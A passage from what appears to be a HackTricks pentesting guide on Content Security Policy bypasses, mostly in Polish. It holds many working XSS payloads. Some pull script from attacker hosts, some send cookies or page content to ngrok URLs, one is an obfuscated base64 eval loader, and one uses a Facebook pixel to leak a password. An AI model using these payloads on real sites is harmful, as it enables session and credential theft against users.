Content Security Policy (CSP) Bypass

Reading time: 32 minutes

tip

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Ucz się i ćwicz Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Wsparcie dla HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.

Czym jest CSP

Content Security Policy (CSP) jest technologią przeglądarkową, mającą na celu przede wszystkim ochronę przed atakami takimi jak cross-site scripting (XSS). Polega na określaniu i definiowaniu ścieżek oraz źródeł, z których przeglądarka może bezpiecznie ładować zasoby. Te zasoby obejmują różne elementy, takie jak obrazy, ramki oraz JavaScript. Na przykład polityka może zezwalać na ładowanie i wykonywanie zasobów z tej samej domeny (self), włączając zasoby inline oraz wykonywanie kodu w postaci łańcucha za pomocą funkcji takich jak eval, setTimeout lub setInterval.

Wdrażanie CSP odbywa się poprzez nagłówki odpowiedzi lub przez umieszczenie elementów meta w stronie HTML. Przeglądarki egzekwują tę politykę i natychmiast blokują wszelkie wykryte naruszenia.

Implementowane przez nagłówek odpowiedzi:

Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com; style-src 'self';

Zaimplementowane za pomocą meta tagu:

xml

<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">

Nagłówki

CSP można egzekwować lub monitorować za pomocą tych nagłówków:

Content-Security-Policy: Enforces the CSP; the browser blocks any violations.
Content-Security-Policy-Report-Only: Used for monitoring; reports violations without blocking them. Ideal for testing in pre-production environments.

Definiowanie zasobów

CSP ogranicza pochodzenie ładowanych treści, zarówno aktywnych, jak i pasywnych, kontrolując takie aspekty jak wykonywanie inline JavaScript oraz użycie eval(). Przykładowa polityka wygląda następująco:

bash

default-src 'none';
img-src 'self';
script-src 'self' https://code.jquery.com;
style-src 'self';
report-uri /cspreport
font-src 'self' https://addons.cdn.mozilla.net;
frame-src 'self' https://ic.paypal.com https://paypal.com;
media-src https://videos.cdn.mozilla.net;
object-src 'none';

Dyrektywy

script-src: Pozwala na określone źródła dla JavaScriptu, w tym URL-e, skrypty inline oraz skrypty wywoływane przez event handlery lub arkusze stylów XSLT.
default-src: Ustawia domyślną politykę pobierania zasobów, gdy brak jest konkretnych dyrektyw fetch.
child-src: Określa dozwolone zasoby dla web workers i osadzonej zawartości ramek.
connect-src: Ogranicza URL-e, które mogą być ładowane przy użyciu interfejsów takich jak fetch, WebSocket, XMLHttpRequest.
frame-src: Ogranicza URL-e dla frame'ów.
frame-ancestors: Określa, które źródła mogą osadzać bieżącą stronę, ma zastosowanie do elementów takich jak , , <object>, <embed> i <applet>.</li> <li><strong>img-src</strong>: Definiuje dozwolone źródła obrazów.</li> <li><strong>font-src</strong>: Określa prawidłowe źródła dla czcionek ładowanych przy użyciu <code>@font-face</code>.</li> <li><strong>manifest-src</strong>: Definiuje dozwolone źródła plików manifestu aplikacji.</li> <li><strong>media-src</strong>: Definiuje dozwolone źródła do ładowania obiektów multimedialnych.</li> <li><strong>object-src</strong>: Definiuje dozwolone źródła dla elementów <object>, <embed> i <applet>.</li> <li><strong>base-uri</strong>: Określa dozwolone URL-e do użycia w elementach <base>.</li> <li><strong>form-action</strong>: Wymienia prawidłowe endpointy dla submitów formularzy.</li> <li><strong>plugin-types</strong>: Ogranicza mime type, które strona może wywoływać.</li> <li><strong>upgrade-insecure-requests</strong>: Nakazuje przeglądarce przepisać URL-e HTTP na HTTPS.</li> <li><strong>sandbox</strong>: Stosuje ograniczenia podobne do atrybutu sandbox elementu <iframe>.</li> <li><strong>report-to</strong>: Określa grupę, do której zostanie wysłane zgłoszenie w przypadku naruszenia polityki.</li> <li><strong>worker-src</strong>: Określa prawidłowe źródła dla skryptów Worker, SharedWorker lub ServiceWorker.</li> <li><strong>prefetch-src</strong>: Określa prawidłowe źródła dla zasobów, które będą pobierane lub prefetchowane.</li> <li><strong>navigate-to</strong>: Ogranicza URL-e, do których dokument może nawigować dowolnym sposobem (a, form, window.location, window.open, itp.)</li> </ul> <h3 id="Źródła"><a class="header" href="#Źródła">Źródła</a></h3> <ul> <li><code>*</code>: Pozwala wszystkie URL-e z wyjątkiem tych ze schematami <code>data:</code>, <code>blob:</code>, <code>filesystem:</code>.</li> <li><code>'self'</code>: Pozwala na ładowanie z tej samej domeny.</li> <li><code>'data'</code>: Pozwala na ładowanie zasobów za pomocą schematu data (np. obrazy Base64).</li> <li><code>'none'</code>: Blokuje ładowanie z jakiegokolwiek źródła.</li> <li><code>'unsafe-eval'</code>: Pozwala na użycie <code>eval()</code> i podobnych metod, niezalecane ze względów bezpieczeństwa.</li> <li><code>'unsafe-hashes'</code>: Umożliwia konkretne inline event handlery.</li> <li><code>'unsafe-inline'</code>: Pozwala na użycie zasobów inline, takich jak inline <code><script></code> lub <code><style></code>, niezalecane ze względów bezpieczeństwa.</li> <li><code>'nonce'</code>: Biała lista dla konkretnych inline skryptów używających kryptograficznego nonce (number used once).</li> <li>Jeśli masz ograniczone wykonanie JS, możliwe jest pobranie użytego nonce ze strony za pomocą <code>doc.defaultView.top.document.querySelector("[nonce]")</code>, a następnie ponowne jego użycie do załadowania złośliwego skryptu (jeśli użyty jest strict-dynamic, dowolne dozwolone źródło może ładować nowe źródła, więc to nie jest konieczne), na przykład w:</li> </ul> <details> <summary>Załaduj skrypt ponownie używając nonce</summary> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"> <img src="x" ng-on-error=' doc=$event.target.ownerDocument; a=doc.defaultView.top.document.querySelector("[nonce]"); b=doc.createElement("script"); b.src="//example.com/evil.js"; b.nonce=a.nonce; doc.body.appendChild(b)' /> </code></pre> </details> <ul> <li><code>'sha256-<hash>'</code>: Dodaje do białej listy skrypty z określonym haszem sha256.</li> <li><code>'strict-dynamic'</code>: Pozwala na ładowanie skryptów z dowolnego źródła, jeśli zostały umieszczone na białej liście przez nonce lub hash.</li> <li><code>'host'</code>: Określa konkretny host, np. <code>example.com</code>.</li> <li><code>https:</code>: Ogranicza adresy URL do tych używających HTTPS.</li> <li><code>blob:</code>: Pozwala na ładowanie zasobów z Blob URL-i (np. Blob URL-i utworzonych przez JavaScript).</li> <li><code>filesystem:</code>: Pozwala na ładowanie zasobów z systemu plików.</li> <li><code>'report-sample'</code>: Dołącza próbkę naruszającego kodu do raportu o naruszeniu (przydatne do debugowania).</li> <li><code>'strict-origin'</code>: Podobne do 'self', ale zapewnia, że poziom bezpieczeństwa protokołu źródeł odpowiada dokumentowi (tylko bezpieczne originy mogą ładować zasoby z bezpiecznych originów).</li> <li><code>'strict-origin-when-cross-origin'</code>: Wysyła pełne adresy URL przy żądaniach same-origin, ale wysyła tylko origin przy żądaniach cross-origin.</li> <li><code>'unsafe-allow-redirects'</code>: Pozwala na ładowanie zasobów, które natychmiast przekierowują do innego zasobu. Niezalecane, ponieważ osłabia bezpieczeństwo.</li> </ul> <h2 id="niebezpieczne-reguły-csp"><a class="header" href="#niebezpieczne-reguły-csp">Niebezpieczne reguły CSP</a></h2> <h3 id="unsafe-inline"><a class="header" href="#unsafe-inline">'unsafe-inline'</a></h3> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">yaml</span></div> <pre><code class="language-yaml">Content-Security-Policy: script-src https://google.com 'unsafe-inline'; </code></pre> <p>Działający payload: <code>"/><script>alert(1);</script></code></p> <h4 id="self--unsafe-inline-przez-iframey"><a class="header" href="#self--unsafe-inline-przez-iframey">self + 'unsafe-inline' przez iframe'y</a></h4> <p><a class="content_ref" href="csp-bypass-self-+-unsafe-inline-with-iframes.html"><span class="content_ref_label">CSP bypass: self + 'unsafe-inline' with Iframes</span></a></p> <h3 id="unsafe-eval"><a class="header" href="#unsafe-eval">'unsafe-eval'</a></h3> <div class="mdbook-alerts mdbook-alerts-caution"> <p class="mdbook-alerts-title"> <span class="mdbook-alerts-icon"></span> caution </p> <p>To nie działa — więcej informacji: <a href="https://github.com/HackTricks-wiki/hacktricks/issues/653"><strong>sprawdź to</strong></a>.</p> </div> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">yaml</span></div> <pre><code class="language-yaml">Content-Security-Policy: script-src https://google.com 'unsafe-eval'; </code></pre> <p>Działający payload:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script> </code></pre> <h3 id="strict-dynamic"><a class="header" href="#strict-dynamic">strict-dynamic</a></h3> <p>Jeśli w jakiś sposób sprawisz, że <strong>dozwolony kod JS utworzy nowy script tag</strong> w DOM zawierający twój kod JS — ponieważ to dozwolony skrypt go tworzy, <strong>nowy script tag będzie mógł zostać wykonany</strong>.</p> <h3 id="wildcard-"><a class="header" href="#wildcard-">Wildcard (*)</a></h3> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">yaml</span></div> <pre><code class="language-yaml">Content-Security-Policy: script-src 'self' https://google.com https: data *; </code></pre> <p>Działający payload:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html">"/>'><script src=https://attacker-website.com/evil.js></script> "/>'><script src=data:text/javascript,alert(1337)></script> </code></pre> <h3 id="brak-object-src-i-default-src"><a class="header" href="#brak-object-src-i-default-src">Brak object-src i default-src</a></h3> <blockquote> <p>[!CAUTION] > <strong>Wygląda na to, że to już nie działa</strong></p> </blockquote> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">yaml</span></div> <pre><code class="language-yaml">Content-Security-Policy: script-src 'self' ; </code></pre> <p>Działające payloads:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> ">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'> <param name="AllowScriptAccess" value="always"></object> </code></pre> <h3 id="przesyłanie-plików--self"><a class="header" href="#przesyłanie-plików--self">Przesyłanie plików + 'self'</a></h3> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">yaml</span></div> <pre><code class="language-yaml">Content-Security-Policy: script-src 'self'; object-src 'none' ; </code></pre> <p>Jeśli możesz przesłać plik JS, możesz obejść tę CSP:</p> <p>Działający payload:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html">"/>'><script src="/uploads/picture.png.js"></script> </code></pre> <p>However, it's highly probable that the server is <strong>validating the uploaded file</strong> and will only allow you to <strong>upload determined type of files</strong>.</p> <p>Moreover, even if you could upload a <strong>JS code inside</strong> a file using an extension accepted by the server (like: <em>script.png</em>) this won't be enough because some servers like apache server <strong>select MIME type of the file based on the extension</strong> and browsers like Chrome will <strong>reject to execute Javascript</strong> code inside something that should be an image. "Hopefully", there are mistakes. For example, from a CTF I learnt that <strong>Apache doesn't know</strong> the <em><strong>.wave</strong></em> extension, therefore it doesn't serve it with a <strong>MIME type like audio/</strong>*.</p> <p>From here, if you find a XSS and a file upload, and you manage to find a <strong>misinterpreted extension</strong>, you could try to upload a file with that extension and the Content of the script. Or, if the server is checking the correct format of the uploaded file, create a polyglot (<a href="https://github.com/Polydet/polyglot-database">some polyglot examples here</a>).</p> <h3 id="form-action"><a class="header" href="#form-action">Form-action</a></h3> <p>If not possible to inject JS, you could still try to exfiltrate for example credentials <strong>injecting a form action</strong> (and maybe expecting password managers to auto-fill passwords). You can find an <a href="https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp"><strong>example in this report</strong></a>. Also, notice that <code>default-src</code> does not cover form actions.</p> <h3 id="third-party-endpoints--unsafe-eval"><a class="header" href="#third-party-endpoints--unsafe-eval">Third Party Endpoints + ('unsafe-eval')</a></h3> <div class="mdbook-alerts mdbook-alerts-warning"> <p class="mdbook-alerts-title"> <span class="mdbook-alerts-icon"></span> warning </p> <p>For some of the following payload <strong><code>unsafe-eval</code> is not even needed</strong>.</p> </div> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">yaml</span></div> <pre><code class="language-yaml">Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval'; </code></pre> <p>Załaduj podatną wersję angular i wykonaj dowolny kod JS:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">xml</span></div> <pre><code class="language-xml"><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script> <div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div> "><script src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div> "><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script> <div ng-app ng-csp id=p ng-click=$event.view.alert(1337)> With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-author-writeup/ <script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js></script> <iframe/ng-app/ng-csp/srcdoc=" <script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.0/angular.js> </script> <img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>" > </code></pre> <h4 id="payloads-używające-angular--biblioteki-której-funkcje-zwracają-obiekt-window-check-out-this-post"><a class="header" href="#payloads-używające-angular--biblioteki-której-funkcje-zwracają-obiekt-window-check-out-this-post">Payloads używające Angular + biblioteki, której funkcje zwracają obiekt <code>window</code> (<a href="https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/">check out this post</a>):</a></h4> <div class="mdbook-alerts mdbook-alerts-tip"> <p class="mdbook-alerts-title"> <span class="mdbook-alerts-icon"></span> tip </p> <p>W poście pokazano, że można <strong>załadować</strong> wszystkie <strong>biblioteki</strong> z <code>cdn.cloudflare.com</code> (lub z dowolnego innego dozwolonego repozytorium bibliotek JS), wykonać wszystkie dodane funkcje z każdej biblioteki i sprawdzić <strong>które funkcje z których bibliotek zwracają obiekt <code>window</code></strong>.</p> </div> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script> <div ng-app ng-csp> {{$on.curry.call().alert(1)}} {{[].empty.call().alert([].empty.call().document.domain)}} {{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }} </div> <script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script> <div ng-app ng-csp> {{$on.curry.call().alert('xss')}} </div> <script src="https://cdnjs.cloudflare.com/ajax/libs/mootools/1.6.0/mootools-core.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script> <div ng-app ng-csp> {{[].erase.call().alert('xss')}} </div> </code></pre> <p>Angular XSS z nazwy klasy:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><div ng-app> <strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong> </div> </code></pre> <h4 id="nadużywanie-google-recaptcha-js-code"><a class="header" href="#nadużywanie-google-recaptcha-js-code">Nadużywanie google recaptcha JS code</a></h4> <p>Zgodnie z <a href="https://blog-huli-tw.translate.goog/2023/07/28/google-zer0pts-imaginary-ctf-2023-writeup/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=es&_x_tr_pto=wapp#noteninja-3-solves"><strong>this CTF writeup</strong></a> można nadużyć <a href="https://www.google.com/recaptcha/">https://www.google.com/recaptcha/</a> wewnątrz CSP, aby wykonać dowolny kod JS, omijając CSP:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><div ng-controller="CarouselController as c" ng-init="c.init()" > &#91[c.element.ownerDocument.defaultView.parent.location="http://google.com?"+c.element.ownerDocument.cookie]] <div carousel><div slides></div></div> <script src="https://www.google.com/recaptcha/about/js/main.min.js"></script> </code></pre> <p>Więcej <a href="https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/"><strong>payloads from this writeup</strong></a>:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>  <img src="x" ng-on-error="$event.target.ownerDocument.defaultView.alert(1)" />  <img src="x" ng-on-error=' doc=$event.target.ownerDocument; a=doc.defaultView.top.document.querySelector("[nonce]"); b=doc.createElement("script"); b.src="//example.com/evil.js"; b.nonce=a.nonce; doc.body.appendChild(b)' /> </code></pre> <h4 id="wykorzystywanie-wwwgooglecom-do-open-redirect"><a class="header" href="#wykorzystywanie-wwwgooglecom-do-open-redirect">Wykorzystywanie www.google.com do open redirect</a></h4> <p>Poniższy URL przekierowuje do example.com (z <a href="https://www.landh.tech/blog/20240304-google-hack-50000/">here</a>):</p> <pre><code>https://www.google.com/amp/s/example.com/ </code></pre> <p>Nadużywanie *.google.com/script.google.com</p> <p>Możliwe jest nadużycie Google Apps Script, aby otrzymywać informacje na stronie w serwisie script.google.com. Tak jak to zostało <a href="https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/">zrobione w tym raporcie</a>.</p> <h3 id="punkty-końcowe-stron-trzecich--jsonp"><a class="header" href="#punkty-końcowe-stron-trzecich--jsonp">Punkty końcowe stron trzecich + JSONP</a></h3> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">http</span></div> <pre><code class="language-http">Content-Security-Policy: script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none'; </code></pre> <p>Sytuacje takie jak ta, gdy <code>script-src</code> jest ustawiony na <code>self</code> i konkretna domena znajduje się na białej liście, można obejść za pomocą JSONP. JSONP endpoints pozwalają na niezabezpieczone metody callback, które umożliwiają atakującemu wykonanie XSS, działający payload:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html">"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script> "><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script> </code></pre> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html">https://www.youtube.com/oembed?callback=alert; <script src="https://www.youtube.com/oembed?url=http://www.youtube.com/watch?v=bDOYN-6gdRE&format=json&callback=fetch(`/profile`).then(function f1(r){return r.text()}).then(function f2(txt){location.href=`https://b520-49-245-33-142.ngrok.io?`+btoa(txt)})"></script> </code></pre> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><script type="text/javascript" crossorigin="anonymous" src="https://accounts.google.com/o/oauth2/revoke?callback=eval(atob(%27KGZ1bmN0aW9uKCl7CiBsZXQgdnIgPSAoKT0%2Be3dpdGgobmV3IHRvcFsnVydbJ2NvbmNhdCddKCdlYicsJ1MnLCdjZycmJidvY2snfHwncGsnLCdldCcpXSgndydbJ2NvbmNhdCddKCdzcycsJzpkZWZkZWYnLCdsaScsJ3ZlY2hhdGknLCduYycsJy4nfHwnOycsJ25ldHdvcmtkZWZjaGF0cGlwZWRlZjAyOWRlZicpWydzcGxpdCddKCdkZWYnKVsnam9pbiddKCIvIikpKShvbm1lc3NhZ2U9KGUpPT5uZXcgRnVuY3Rpb24oYXRvYihlWydkYXRhJ10pKS5jYWxsKGVbJ3RhcmdldCddKSl9O25hdmlnYXRvclsnd2ViZHJpdmVyJ118fChsb2NhdGlvblsnaHJlZiddWydtYXRjaCddKCdjaGVja291dCcpJiZ2cigpKTsKfSkoKQ%3D%3D%27));"></script> </code></pre> <p><a href="https://github.com/zigoo0/JSONBee"><strong>JSONBee</strong></a> <strong>zawiera gotowe endpointy JSONP do obejścia CSP różnych stron.</strong></p> <p>Ta sama luka wystąpi, jeśli <strong>zaufany endpoint zawiera Open Redirect</strong>, ponieważ jeśli początkowy endpoint jest zaufany, przekierowania również są traktowane jako zaufane.</p> <h3 id="nadużycia-stron-trzecich"><a class="header" href="#nadużycia-stron-trzecich">Nadużycia stron trzecich</a></h3> <p>Jak opisano w <a href="https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses">following post</a>, istnieje wiele domen stron trzecich, które mogą być gdzieś dozwolone w CSP i mogą być nadużyte do exfiltrate danych lub wykonania kodu JavaScript. Niektóre z tych stron trzecich to:</p> <div class="table-wrapper"><table><thead><tr><th>Podmiot</th><th>Dozwolona domena</th><th>Możliwości</th></tr></thead><tbody> <tr><td>Facebook</td><td>www.facebook.com, *.facebook.com</td><td>Exfil</td></tr> <tr><td>Hotjar</td><td>*.hotjar.com, ask.hotjar.io</td><td>Exfil</td></tr> <tr><td>Jsdelivr</td><td>*.jsdelivr.com, cdn.jsdelivr.net</td><td>Exec</td></tr> <tr><td>Amazon CloudFront</td><td>*.cloudfront.net</td><td>Exfil, Exec</td></tr> <tr><td>Amazon AWS</td><td>*.amazonaws.com</td><td>Exfil, Exec</td></tr> <tr><td>Azure Websites</td><td>*.azurewebsites.net, *.azurestaticapps.net</td><td>Exfil, Exec</td></tr> <tr><td>Salesforce Heroku</td><td>*.herokuapp.com</td><td>Exfil, Exec</td></tr> <tr><td>Google Firebase</td><td>*.firebaseapp.com</td><td>Exfil, Exec</td></tr> </tbody></table> </div> <p>Jeśli znajdziesz którąkolwiek z dozwolonych domen w CSP twojego celu, istnieje duża szansa, że będziesz w stanie obejść CSP, rejestrując się w usłudze strony trzeciej i exfiltrate dane do tej usługi lub wykonać kod.</p> <p>Na przykład, jeśli znajdziesz następujący CSP:</p> <pre><code>Content-Security-Policy: default-src 'self’ www.facebook.com; </code></pre> <p>lub</p> <pre><code>Content-Security-Policy: connect-src www.facebook.com; </code></pre> <p>Powinieneś być w stanie eksfiltrować dane, podobnie jak zawsze robiono to za pomocą <a href="https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp">Google Analytics</a>/<a href="https://blog.deteact.com/csp-bypass/">Google Tag Manager</a>. W tym przypadku wykonaj następujące ogólne kroki:</p> <ol> <li>Utwórz Facebook Developer account tutaj.</li> <li>Utwórz nową aplikację "Facebook Login" i wybierz "Website".</li> <li>Przejdź do "Settings -> Basic" i pobierz swój "App ID"</li> <li>Na docelowej stronie, z której chcesz eksfiltrować dane, możesz to zrobić bezpośrednio używając Facebook SDK gadget "fbq" przez "customEvent" i data payload.</li> <li>Przejdź do swojego App "Event Manager" i wybierz aplikację, którą utworzyłeś (uwaga: event manager może być dostępny pod URL podobnym do tego: https://www.facebook.com/events_manager2/list/pixel/[app-id]/test_events</li> <li>Wybierz zakładkę "Test Events", aby zobaczyć eventy wysyłane przez "your" web site.</li> </ol> <p>Następnie, po stronie victim, wykonaj następujący kod, aby zainicjalizować Facebook tracking pixel wskazujący na attacker's Facebook developer account app-id i wywołać custom event w ten sposób:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">JavaScript</span></div> <pre><code class="language-JavaScript">fbq('init', '1279785999289471'); // this number should be the App ID of the attacker's Meta/Facebook account fbq('trackCustom', 'My-Custom-Event',{ data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'" }); </code></pre> <p>Jeśli chodzi o pozostałe siedem domen third-party wymienionych w poprzedniej tabeli, istnieje wiele innych sposobów ich nadużycia. Zapoznaj się z wcześniej opublikowanym <a href="https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses">blog post</a> zawierającym dodatkowe wyjaśnienia dotyczące innych nadużyć third-party.</p> <h3 id="bypass-via-rpo-relative-path-overwrite"><a class="header" href="#bypass-via-rpo-relative-path-overwrite">Bypass via RPO (Relative Path Overwrite) <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a></a></h3> <p>Oprócz wspomnianego przekierowania używanego do obejścia ograniczeń ścieżek, istnieje inna technika nazwana Relative Path Overwrite (RPO), którą można wykorzystać na niektórych serwerach.</p> <p>Na przykład, jeśli CSP zezwala na ścieżkę <code>https://example.com/scripts/react/</code>, można ją obejść w następujący sposób:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><script src="https://example.com/scripts/react/..%2fangular%2fangular.js"></script> </code></pre> <p>Przeglądarka ostatecznie załaduje <code>https://example.com/scripts/angular/angular.js</code>.</p> <p>Działa to, ponieważ dla przeglądarki ładujesz plik nazwany <code>..%2fangular%2fangular.js</code> znajdujący się pod <code>https://example.com/scripts/react/</code>, co jest zgodne z CSP.</p> <p>W efekcie przeglądarka zdekoduje to, skutecznie żądając <code>https://example.com/scripts/react/../angular/angular.js</code>, co jest równoważne <code>https://example.com/scripts/angular/angular.js</code>.</p> <p>Poprzez <strong>wykorzystanie tej niezgodności interpretacji URL pomiędzy przeglądarką a serwerem, reguły ścieżek można obejść</strong>.</p> <p>Rozwiązaniem jest nie traktować <code>%2f</code> jako <code>/</code> po stronie serwera, zapewniając spójną interpretację pomiędzy przeglądarką a serwerem, aby uniknąć tego problemu.</p> <p>Przykład online:<a href="https://jsbin.com/werevijewa/edit?html,output"> </a><a href="https://jsbin.com/werevijewa/edit?html,output">https://jsbin.com/werevijewa/edit?html,output</a></p> <h3 id="wykonywanie-js-w-iframeach"><a class="header" href="#wykonywanie-js-w-iframeach">Wykonywanie JS w iframe'ach</a></h3> <p><a class="content_ref" href="../xss-cross-site-scripting/iframes-in-xss-and-csp.html"><span class="content_ref_label">Iframes in XSS, CSP and SOP</span></a></p> <h3 id="brak-base-uri"><a class="header" href="#brak-base-uri">brak <strong>base-uri</strong></a></h3> <p>Jeśli dyrektywa <strong>base-uri</strong> jest nieobecna, możesz ją wykorzystać do przeprowadzenia <a href="../dangling-markup-html-scriptless-injection/index.html"><strong>dangling markup injection</strong></a>.</p> <p>Moreover, if the <strong>page is loading a script using a relative path</strong> (like <code><script src="/js/app.js"></code>) using a <strong>Nonce</strong>, you can abuse the <strong>base</strong> <strong>tag</strong> to make it <strong>load</strong> the script from <strong>your own server achieving a XSS.</strong><br /> If the vulnerable page is loaded with <strong>httpS</strong>, make use an httpS url in the base.</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><base href="https://www.attacker.com/" /> </code></pre> <h3 id="zdarzenia-angularjs"><a class="header" href="#zdarzenia-angularjs">Zdarzenia AngularJS</a></h3> <p>Specyficzna polityka znana jako Content Security Policy (CSP) może ograniczać zdarzenia JavaScript. Jednak AngularJS wprowadza własne zdarzenia jako alternatywę. W ramach zdarzenia AngularJS udostępnia specjalny obiekt <code>$event</code>, wskazujący natywny obiekt zdarzenia przeglądarki. Obiekt <code>$event</code> można wykorzystać do obejścia CSP. Co ważne, w Chrome obiekt <code>$event/event</code> ma atrybut <code>path</code>, zawierający tablicę obiektów zaangażowanych w łańcuch wykonania zdarzenia, przy czym obiekt <code>window</code> znajduje się zawsze na końcu. Ta struktura jest kluczowa dla taktyk ucieczki z sandboxa.</p> <p>Przekierowując tę tablicę do filtra <code>orderBy</code>, można po niej iterować, wykorzystując element końcowy (obiekt <code>window</code>) do wywołania globalnej funkcji, np. <code>alert()</code>. Poniższy przykładowy fragment kodu ilustruje ten proces:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">xml</span></div> <pre><code class="language-xml"><input%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27>#x ?search=<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>#x </code></pre> <p>Ten fragment podkreśla użycie dyrektywy <code>ng-focus</code> do wywołania zdarzenia, wykorzystując <code>$event.path|orderBy</code> do manipulacji tablicą <code>path</code>, oraz używając obiektu <code>window</code> do wywołania funkcji <code>alert()</code>, co w rezultacie ujawnia <code>document.cookie</code>.</p> <p><strong>Znajdź inne Angular bypasses na</strong> <a href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet"><strong>https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</strong></a></p> <h3 id="angularjs-and-whitelisted-domain"><a class="header" href="#angularjs-and-whitelisted-domain">AngularJS and whitelisted domain</a></h3> <pre><code>Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url; </code></pre> <p>Politykę CSP, która dopuszcza określone domeny do ładowania skryptów w aplikacji Angular JS, można obejść przez wywołanie callback functions oraz niektórych podatnych klas. Szczegółowe informacje na temat tej techniki znajdują się w obszernym przewodniku dostępnym w tym <a href="https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22">git repository</a>.</p> <p>Działające payloads:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script> ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>  <script 